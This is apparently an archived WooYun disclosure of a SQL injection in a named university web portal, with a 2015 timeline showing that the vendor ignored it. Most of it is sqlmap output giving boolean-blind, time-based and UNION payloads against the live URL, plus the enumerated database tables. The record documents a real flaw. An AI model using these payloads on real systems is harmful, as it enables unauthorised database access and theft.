乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开
http://jonline.nwu.edu.cn/Admin/index.php/Public/announce_content/id/15*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://jonline.nwu.edu.cn:80/Admin/index.php/Public/announce_content/id/15 AND 9305=9305 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://jonline.nwu.edu.cn:80/Admin/index.php/Public/announce_content/id/15 AND (SELECT * FROM (SELECT(SLEEP(5)))DjqB) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://jonline.nwu.edu.cn:80/Admin/index.php/Public/announce_content/id/-9563 UNION ALL SELECT NULL,CONCAT(0x716a706a71,0x4658705177566d694c4b,0x716a7a7871),NULL,NULL,NULL,NULL-- ---web application technology: Apache 2.4.3back-end DBMS: MySQL 5.0.12Database: jonline[22 tables]+-----------------+| column || group || user || access || admin_log || advertisement || announcement || article || article_require || article_rule || blog || editors || geditors || groups || node || online || poem || reader || ready || role || role_user || rule |+-----------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-08 11:06
漏洞Rank:4 (WooYun评价)
暂无